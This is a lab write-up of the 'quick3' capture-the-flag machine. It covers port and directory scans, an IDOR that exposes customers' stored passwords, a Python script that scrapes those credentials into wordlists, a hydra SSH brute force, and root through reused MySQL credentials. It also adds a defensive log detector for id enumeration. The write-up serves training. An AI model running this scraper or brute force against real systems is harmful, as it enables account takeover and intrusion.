【OSCP】quick3

admin · 2024-03-27 08:47:59 · 7 views · 4255 characters · 14 min read

Lab overview

quick3

easy

Skills: vulnerability discovery, authorization (IDOR) testing, Python scraping, scripting, Hydra brute forcing, credential harvesting

Information gathering

Host discovery

nmap -sn 192.168.1.0/24

Port scan

└─# nmap -sV -A -p- -T4 192.168.1.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 02:02 EST
Nmap scan report for 192.168.1.51
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 2e:7a:1f:17:57:44:6f:7f:f9:ce:ab:a1:4f:cd:c7:19 (ECDSA)
|_ 256 93:7e:d6:c9:03:5b:a1:ee:1d:54:d0:f0:27:0f:13:eb (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Quick Automative - Home
MAC Address: 08:00:27:28:12:35 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 192.168.1.51

Directory scan

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.51 -x html,txt,php -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.51
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.51/.php (Status: 403) [Size: 277]
http://192.168.1.51/.html (Status: 403) [Size: 277]
http://192.168.1.51/images (Status: 301) [Size: 313] [--> http://192.168.1.51/images/]
http://192.168.1.51/index.html (Status: 200) [Size: 51414]
http://192.168.1.51/img (Status: 301) [Size: 310] [--> http://192.168.1.51/img/]
http://192.168.1.51/modules (Status: 301) [Size: 314] [--> http://192.168.1.51/modules/]
http://192.168.1.51/css (Status: 301) [Size: 310] [--> http://192.168.1.51/css/]
http://192.168.1.51/lib (Status: 301) [Size: 310] [--> http://192.168.1.51/lib/]
http://192.168.1.51/js (Status: 301) [Size: 309] [--> http://192.168.1.51/js/]
http://192.168.1.51/customer (Status: 301) [Size: 315] [--> http://192.168.1.51/customer/]
http://192.168.1.51/404.html (Status: 200) [Size: 5013]
http://192.168.1.51/fonts (Status: 301) [Size: 312] [--> http://192.168.1.51/fonts/]
http://192.168.1.51/.php (Status: 403) [Size: 277]
http://192.168.1.51/.html (Status: 403) [Size: 277]
http://192.168.1.51/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

Initial access

I registered an account and went looking for bugs. The personal-information page has an insecure direct object reference (IDOR): iterating the id parameter lets you view any user's profile.

Changing the id gives horizontal privilege escalation, so every customer's profile (including the password echoed back in the form) is readable.

I tried logging in over SSH as the id=1 user, but that failed.

Next I wrote a script to harvest usernames and passwords from the profiles for an SSH brute force.

import os
import re
from datetime import datetime
import requests
import urllib3

# Append one scraped username per line to user_YYYYMMDD.txt (hydra -L input)
def write1(user_match):
    curr_dir = os.getcwd()
    vuln_file = '/user_' + datetime.now().date().strftime('%Y%m%d') + '.txt'
    with open(curr_dir + vuln_file, 'a+', encoding='utf-8') as f:
        f.write(f"{user_match}\n")

# Append one scraped password per line to passwd_YYYYMMDD.txt (hydra -P input)
def write2(pass_match):
    curr_dir = os.getcwd()
    vuln_file = '/passwd_' + datetime.now().date().strftime('%Y%m%d') + '.txt'
    with open(curr_dir + vuln_file, 'a+', encoding='utf-8') as f:
        f.write(f"{pass_match}\n")

def poc_url(id):
    urllib3.disable_warnings()
    url1 = f"http://192.168.1.51/customer/user.php?id={id}"
    # Burp proxy; pass proxies=proxy instead of None to watch the requests
    proxy = {'http': 'http://127.0.0.1:8080',
             'https': 'http://127.0.0.1:8080'
             }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
        "Cookie": "PHPSESSID=bgs8b3cbme4q6kgdh4kaukh4in"  # session of the account we registered
    }
    res = requests.get(url1, headers=headers, proxies=None, verify=False, timeout=5)

    if res.status_code == 200:
        # The profile form echoes the user's name and current password as input values
        user_match = re.search(r'<input type="text" id="name" name="name" value="([^"]+)" required>',
                               res.text)
        pass_match = re.search(r'<input type="password" id="oldpassword" name="oldpassword" value="([^"]+)" required>',
                               res.text)
        if user_match is None or pass_match is None:
            return  # page returned 200 but did not contain the expected form
        # keep only the first word of the name, lowercased, as the candidate username
        write1(user_match.group(1).lower().split()[0])
        write2(pass_match.group(1))

if __name__ == '__main__':
    for i in range(1, 30):
        poc_url(i)

The scraped names still contain surnames that need removing; since there were only a few, I deleted them by hand and kept only the given names for the brute force.

hydra -L user_20240229.txt -P passwd_20240229.txt ssh://192.168.1.51
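As an added example (not part of the original write-up), here is what the id sweep above looks like from the server side: a small Python detector that parses constructed Apache access-log lines and flags any client that successfully fetches many distinct customer/user.php?id= values, the signature of an IDOR enumeration. The log lines, client IPs and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Apache combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The vulnerable endpoint from the write-up; only the id query parameter matters here.
ID_RE = re.compile(r'^/customer/user\.php\?(?:.*&)?id=(\d+)')

def profile_ids_by_client(log_lines):
    """Map each client IP to the ordered list of profile ids it fetched with HTTP 200."""
    seen = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        idm = ID_RE.match(m.group('path'))
        if idm and m.group('status') == '200':
            seen[m.group('ip')].append(int(idm.group(1)))
    return seen

def flag_enumeration(log_lines, max_distinct_ids=5):
    """Return IPs that viewed more than max_distinct_ids different profiles.
    A legitimate customer views their own profile (one id); an IDOR sweep walks many."""
    flagged = {}
    for ip, ids in profile_ids_by_client(log_lines).items():
        distinct = sorted(set(ids))
        if len(distinct) > max_distinct_ids:
            # an unbroken run (1,2,3,...) is the mark of a scripted for-loop over ids
            sequential = all(b - a == 1 for a, b in zip(distinct, distinct[1:]))
            flagged[ip] = {'count': len(distinct), 'sequential': sequential}
    return flagged

# Constructed sample: one normal user, and one client sweeping ids 1..8 plus a missing id 9.
SAMPLE_LOG = [
    '192.168.1.20 - - [29/Feb/2024:02:10:01 -0500] "GET /customer/user.php?id=17 HTTP/1.1" 200 4210',
] + [
    f'192.168.1.77 - - [29/Feb/2024:02:11:{s:02d} -0500] "GET /customer/user.php?id={i} HTTP/1.1" 200 4210'
    for s, i in enumerate(range(1, 9))
] + [
    '192.168.1.77 - - [29/Feb/2024:02:11:09 -0500] "GET /customer/user.php?id=9 HTTP/1.1" 404 5013',
]

if __name__ == '__main__':
    for ip, info in flag_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {info['count']} distinct profile ids, sequential={info['sequential']}")
```

The real fix is server-side: user.php must compare the requested id with the id bound to the session and must never echo the stored password into the form; the detector only tells you that someone is already walking the ids.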


Privilege escalation

After logging in, credential harvesting turned up the MySQL username and password; reusing them to switch to root succeeded.


End


Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】quick3

Source (CN-SEC mirror): http://cn-sec.com/archives/2607315.html